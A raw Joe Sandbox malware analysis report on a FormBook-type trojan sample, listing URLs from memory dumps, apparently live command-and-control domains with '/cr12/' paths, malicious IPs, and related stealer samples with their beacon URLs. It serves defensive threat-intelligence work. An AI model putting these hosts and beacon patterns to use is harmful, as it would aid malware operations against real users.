                                                                                    https://word.office.comexplorer.exe, 00000006.00000003.31961405842.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31967028878.000000000CA4B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230855468.000000000CA94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229091915.000000000C5E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.32856007373.000000000CA62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31967931569.000000000CAB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961045545.000000000CA7F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230740761.000000000CA4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301008086.000000000C5E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.carneden.comReferer:explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://www.jfgminimalist.com/cr12/www.ferradaoffroad.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://tempuri.org/dsGeneral.xsdyPURXYpFVuXra2o.exefalse
                                                                                            		unknown
                                                                                            https://www.liveabout.com/worst-war-films-of-all-time-3438702explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://www.msn.com/en-us/news/world/north-korea-says-it-will-stop-sending-trash-balloons-as-south-kexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.epuar.com/cr12/www.warehouse-inventory-80963.bondexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://www.lotusluxecandle.com/cr12/www.ptwix.xyzexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://www.thetrendingproduct.comReferer:explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://outlook.comexplorer.exe, 00000006.00000003.31961405842.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230855468.000000000CA94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229091915.000000000C5E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31967931569.000000000CAB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961045545.000000000CA7F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301008086.000000000C5E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://imdb.com/explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=f49d9883-4f80-4b3c-a960-1e7cexplorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://www.msn.com/en-us/weather/hourlyforecast/in-Atlanta%2CGeorgia?loc=eyJsIjoiQXRsYW50YSIsInIiOiexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.henslotalt.usexplorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://www.tiktok.com/explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.footresort.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://outlook.compexplorer.exe, 00000006.00000003.31958579029.0000000004CBB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30296440713.0000000004CC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35223272761.0000000004CC2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.free-cell-phones-en-arena.sbs/cr12/explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.sugardefender24-usa.usexplorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://outlook.combexplorer.exe, 00000006.00000003.31967028878.000000000CA4B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.32856007373.000000000CA62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230740761.000000000CA4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://metacritic.com/explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://www.pedandmore.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://www.lotusluxecandle.com/cr12/www.carneden.comexplorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://www.winningpickleballshots.comReferer:explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.ptwix.xyzReferer:explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.nff1291.com/cr12/explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://stacker.com/explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://www.65302.vip/cr12/explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.henslotalt.us/cr12/explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMd4explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.veryaroma.com/cr12/explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.henslotalt.usReferer:explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.msn.com/en-us/lifestyle/shopping/the-21-best-walking-shoes-to-wear-wherever-you-go/ss-AAexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.free-cell-phones-en-arena.sbs/cr12/www.84031.vipexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.thetrendingproduct.com/cr12/explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8-darkexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.epuar.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.lotusluxecandle.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.twitter.com/scishowexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://movieweb.com/historically-accurate-war-movies/#we-were-soldiersexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://schemas.microexplorer.exe, 00000006.00000002.35227465445.000000000A590000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35227096684.0000000009FB0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35221059449.0000000002B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://www.footresort.com/cr12/www.priuswuxi.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://www.thetrendingproduct.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://powerpoint.office.com?explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.00000000090AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://www.msn.com/en-us/news/crime/colorado-man-s-silver-chain-saves-his-life-after-bullet-becomesexplorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://www.msn.com/en-us/movies/news/netflix-users-celebrate-as-2023-masterpiece-finally-debuts-onlexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://aka.ms/odirmexplorer.exe, 00000006.00000003.31961855101.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31964592682.000000000905E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.000000000905F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://www.ferradaoffroad.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://excel.office.coml0explorer.exe, 00000006.00000002.35229091915.000000000C5E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301008086.000000000C5E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://www.bolinkpass.clubReferer:explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://www.carneden.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://www.youtube.com/watch?v=cbN37yRV-ZYexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://www.carneden.com/cr12/www.pedandmore.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://www.sugardefender24-usa.usReferer:explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown

                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                      103.224.212.213
                                                                                                                                                                                                      		www.bolinkpass.clubAustralia
                                                                                                                                                                                                      		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                                                                      172.67.182.124
                                                                                                                                                                                                      		www.spiritualpath.infoUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue

                                                                                                                                                                                                      General Information

                                                                                                                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                      Analysis ID:1450804
                                                                                                                                                                                                      Start date and time:2024-06-03 08:44:32 +02:00
                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 18m 39s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                      Run name:Suspected Instruction Hammering
                                                                                                                                                                                                      Number of analysed new started processes analysed:9
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Sample name:yPURXYpFVuXra2o.exe
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal100.troj.evad.winEXE@520/1@23/2
                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                      • Number of executed functions: 182
                                                                                                                                                                                                      • Number of non-executed functions: 315
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, ecs.office.com
                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                      02:47:39API Interceptor15277362x Sleep call for process: cscript.exe modified
                                                                                                                                                                                                      02:47:48API Interceptor18759828x Sleep call for process: explorer.exe modified

                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                      IPs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      103.224.212.213Ajanlatkeres_2024.05.29.PDF.exeGet hashmaliciousFormBook, LokibotBrowse
                                                                                                                                                                                                      • www.vivaness.club/dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp
                                                                                                                                                                                                      Solicitud de pedido Documento No 168646080.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                      • www.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX
                                                                                                                                                                                                      DHL Factura Electronica Pendiente documento No 04BB25083.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                      • www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR
                                                                                                                                                                                                      PaDQmSw2ud.dllGet hashmaliciousLaplas ClipperBrowse
                                                                                                                                                                                                      • searchseedphase.online/bot/regex
                                                                                                                                                                                                      PaDQmSw2ud.dllGet hashmaliciousLaplas ClipperBrowse
                                                                                                                                                                                                      • searchseedphase.online/bot/regex
                                                                                                                                                                                                      Documento de confirmacion de orden de compra OC 1580070060.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • www.yassa-hany.online/pz08/?mzrPV4R=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVpBqNDhq+c&Rl=8pFP0r98Chvt5p5P
                                                                                                                                                                                                      2024-09C33T37.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • www.jeffwertdesign.com/ve92/?K2M8bVC=FFlo4/TKNXAR7V12oAudCGusg/tK2zFE/4uuQQ9Wgy0sGP4AKi+QV1PLyZgh2gAJGU7I&tXC=BDK02VJ87dHtUzo
                                                                                                                                                                                                      rBCPcomprobante.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • www.yassa-hany.online/pz08/?CrFT7j=ftx8Clc09Ned3F&pR-l7PfH=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVQNLhAw6fb
                                                                                                                                                                                                      Proforma_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                      • www.epansion.com/ao65/?BR-hMX=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+a5ltJSnpB6j&Gzu=sFNxH
                                                                                                                                                                                                      003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                      • www.epansion.com/ao65/?GR0=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+atqjoikrWmu&IDK=RJBh5RS0IZO8zhrP

                                                                                                                                                                                                      Domains

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      www.veryaroma.comyiLe926pJsBgixu.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                      www.sugardefender24-usa.us.cdn.hstgr.netwkUOj276sJEoMFq.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 84.32.84.128
                                                                                                                                                                                                      uBp1DxNGN28IYUZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 84.32.84.46
                                                                                                                                                                                                      parkingpage.namecheap.comyiLe926pJsBgixu.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 91.195.240.19
                                                                                                                                                                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 91.195.240.19
                                                                                                                                                                                                      RFQ 5654077845567895504_d0c.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 91.195.240.19
                                                                                                                                                                                                      PO#2492150 May 29 2024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                      • 91.195.240.19
                                                                                                                                                                                                      Factura 02297-23042024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                      • 91.195.240.19
